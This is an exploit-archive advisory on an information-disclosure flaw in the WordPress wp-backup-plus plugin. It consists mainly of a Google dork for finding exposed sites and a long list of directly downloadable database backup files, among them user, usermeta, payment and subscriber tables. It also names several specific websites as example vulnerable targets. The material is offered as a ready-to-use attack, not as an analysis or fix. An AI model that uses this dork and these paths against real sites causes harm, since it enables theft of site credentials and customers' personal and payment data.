WordPress wp-backup-plus Plugins Database Backup Information Disclosure Vulnerability

2018.11.18

KingSkrupellos (GB)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-264 CWE-23 CWE-200

Dork: inurl:''/wp-content/uploads/wp-backup-plus/''

#################################################################################################
# Exploit Title : WordPress wp-backup-plus Plugins Database Backup Information Disclosure Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 19/11/2018
# Vendor Homepage : wpbackupplus.com ~ wordpress.org
# Tested On : Windows and Linux
# Category : WebApps
# Google Dork : inurl:''/wp-content/uploads/wp-backup-plus/''
# Exploit Risk : Medium
# CWE : CWE-264 - [ Permissions, Privileges, and Access Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
# Other Similar But Missing Informations Exploit Link : exploit-db.com/exploits/34124/
#################################################################################################
# Admin Panel Login Path :
/wp-login.php
# Exploit :
/wp-content/uploads/wp-backup-plus/temp/database.sql
/wp-content/uploads/wp-backup-plus/temp/wp_ak_popularity.sql
/wp-content/uploads/wp-backup-plus/temp/wp_ak_popularity_options.sql
/wp-content/uploads/wp-backup-plus/temp/wp_ak_twitter.sql
/wp-content/uploads/wp-backup-plus/temp/wp_amznclicks.sql
/wp-content/uploads/wp-backup-plus/temp/wp_ar_gwa_leads.sql
/wp-content/uploads/wp-backup-plus/temp/wp_ar_gwa_lists.sql
/wp-content/uploads/wp-backup-plus/temp/wp_ar_gwa_msg.sql
/wp-content/uploads/wp-backup-plus/temp/wp_blr_bad_links.sql
/wp-content/uploads/wp-backup-plus/temp/wp_commentmeta.sql
/wp-content/uploads/wp-backup-plus/temp/wp_comments.sql
/wp-content/uploads/wp-backup-plus/temp/wp_dprv_licenses.sql
/wp-content/uploads/wp-backup-plus/temp/wp_dprv_post_content_files.sql
/wp-content/uploads/wp-backup-plus/temp/wp_dprv_posts.sql
/wp-content/uploads/wp-backup-plus/temp/wp_hitcount.sql
/wp-content/uploads/wp-backup-plus/temp/wp_jam_feed.sql
/wp-content/uploads/wp-backup-plus/temp/wp_jam_settings.sql
/wp-content/uploads/wp-backup-plus/temp/wp_linkizer_link.sql
/wp-content/uploads/wp-backup-plus/temp/wp_linkizer_post_track.sql
/wp-content/uploads/wp-backup-plus/temp/wp_linkizer_statistics.sql
/wp-content/uploads/wp-backup-plus/temp/wp_linkizer_text_track.sql
/wp-content/uploads/wp-backup-plus/temp/wp_linkizer_track.sql
/wp-content/uploads/wp-backup-plus/temp/wp_links.sql
/wp-content/uploads/wp-backup-plus/temp/wp_mban_banner.sql
/wp-content/uploads/wp-backup-plus/temp/wp_mban_options.sql
/wp-content/uploads/wp-backup-plus/temp/wp_mban_zone.sql
/wp-content/uploads/wp-backup-plus/temp/wp_mbp_ping_optimizer.sql
/wp-content/uploads/wp-backup-plus/temp/wp_mbp_ping_optimizer_int.sql
/wp-content/uploads/wp-backup-plus/temp/wp_oiopub_affiliates.sql
/wp-content/uploads/wp-backup-plus/temp/wp_oiopub_affiliates.sql
/wp-content/uploads/wp-backup-plus/temp/wp_oiopub_affiliates_hits.sql
/wp-content/uploads/wp-backup-plus/temp/wp_oiopub_affiliates_sales.sql
/wp-content/uploads/wp-backup-plus/temp/wp_oiopub_config.sql
/wp-content/uploads/wp-backup-plus/temp/wp_oiopub_coupons.sql
/wp-content/uploads/wp-backup-plus/temp/wp_oiopub_purchases.sql
/wp-content/uploads/wp-backup-plus/temp/wp_oiopub_purchases_history.sql
/wp-content/uploads/wp-backup-plus/temp/wp_oiopub_tracker_archive.sql
/wp-content/uploads/wp-backup-plus/temp/wp_oiopub_tracker_clicks.sql
/wp-content/uploads/wp-backup-plus/temp/wp_oiopub_tracker_visits.sql
/wp-content/uploads/wp-backup-plus/temp/wp_options.sql
/wp-content/uploads/wp-backup-plus/temp/wp_pay_per_view.sql
/wp-content/uploads/wp-backup-plus/temp/wp_plb2_data.sql
/wp-content/uploads/wp-backup-plus/temp/wp_pls.sql
/wp-content/uploads/wp-backup-plus/temp/wp_pollsa.sql
/wp-content/uploads/wp-backup-plus/temp/wp_pollsip.sql
/wp-content/uploads/wp-backup-plus/temp/wp_pollsq.sql
/wp-content/uploads/wp-backup-plus/temp/wp_popshops.sql
/wp-content/uploads/wp-backup-plus/temp/wp_popularpostsdata.sql
/wp-content/uploads/wp-backup-plus/temp/wp_popularpostsdata_backup.sql
/wp-content/uploads/wp-backup-plus/temp/wp_popularpostsdatacache.sql
/wp-content/uploads/wp-backup-plus/temp/wp_post_relationships.sql
/wp-content/uploads/wp-backup-plus/temp/wp_pppm_filter.sql
/wp-content/uploads/wp-backup-plus/temp/wp_pppm_html.sql
/wp-content/uploads/wp-backup-plus/temp/wp_pppm_polls.sql
/wp-content/uploads/wp-backup-plus/temp/wp_pppm_polls_items.sql
/wp-content/uploads/wp-backup-plus/temp/wp_pppm_polls_votes.sql
/wp-content/uploads/wp-backup-plus/temp/wp_pppm_protocol.sql
/wp-content/uploads/wp-backup-plus/temp/wp_pppm_shortcut.sql
/wp-content/uploads/wp-backup-plus/temp/wp_prestogifto.sql
/wp-content/uploads/wp-backup-plus/temp/wp_rcp_discounts.sql
/wp-content/uploads/wp-backup-plus/temp/wp_rcp_payments.sql
/wp-content/uploads/wp-backup-plus/temp/wp_restrict_content_pro.sql
/wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_banner_elements.sql
/wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_banners.sql
/wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_campaigns.sql
/wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_counters.sql
/wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_counters_access.sql
/wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_page_types.sql
/wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_pages.sql
/wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_pages_banners.sql
/wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_settings.sql
/wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_tokens.sql
/wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_users.sql
/wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_users_subscriptions.sql
/wp-content/uploads/wp-backup-plus/temp/wp_sharebar.sql
/wp-content/uploads/wp-backup-plus/temp/wp_spec_comment_log.sql
/wp-content/uploads/wp-backup-plus/temp/wp_term_relationships.sql
/wp-content/uploads/wp-backup-plus/temp/wp_term_taxonomy.sql
/wp-content/uploads/wp-backup-plus/temp/wp_terms.sql
/wp-content/uploads/wp-backup-plus/temp/wp_usermeta.sql
/wp-content/uploads/wp-backup-plus/temp/wp_users.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wpaa_cache.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wpaa_template.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wpr_autoresponder_messages.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wpr_autoresponders.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wpr_blog_series.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wpr_blog_subscription.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wpr_custom_fields.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wpr_custom_fields_values.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wpr_followup_subscriptions.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wpr_newsletter_mailouts.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wpr_newsletters.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wpr_queue.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wpr_subscriber_transfer.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wpr_subscribers.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wpr_subscription_form.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wptwitipid.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wsc_gocodes.sql
/wp-content/uploads/wp-backup-plus/temp/wpau_active_plugins_info.sql
/wp-content/uploads/wp-backup-plus/temp/wpau_upgrade_log.sql
/wpbp-YTozOntzOjg6ImhvbWUtdXJsIjtzOjIyOiJodHRwOi8vd2Fzc3VwYmxvZy5jb20v
IjtzOjk6InNpdGUtbmFtZSI7czoxMDoiV2Fzc3VwQmxvZyI7czo5OiJ0aW1lc3RhbXAiO2Q6MTM2MTczNTg5MTt9.zip
/wpbp-YTozOntzOjg6ImhvbWUtdXJsIjtzOjIyOiJodHRwOi8vd2Fzc3VwYmxvZy5jb20vI
jtzOjk6InNpdGUtbmFtZSI7czoxMDoiV2Fzc3VwQmxvZyI7czo5OiJ0aW1lc3RhbXAiO2Q6MTM2MTczNTg5MTt9.zip.log
#################################################################################################
# Example Vulnerable Sites =>
[+] wassupblog.com/wp-content/uploads/wp-backup-plus/temp/wp_ak_twitter.sql
[+] curtiswrightoutfitters.com/wp-content/uploads/wp-backup-plus/temp/database.sql
[+] wpbackupplus.com/wp-content/uploads/wp-backup-plus/temp/
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

WordPress wp-backup-plus Plugins Database Backup Information Disclosure Vulnerability

Dork: inurl:''/wp-content/uploads/wp-backup-plus/''

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.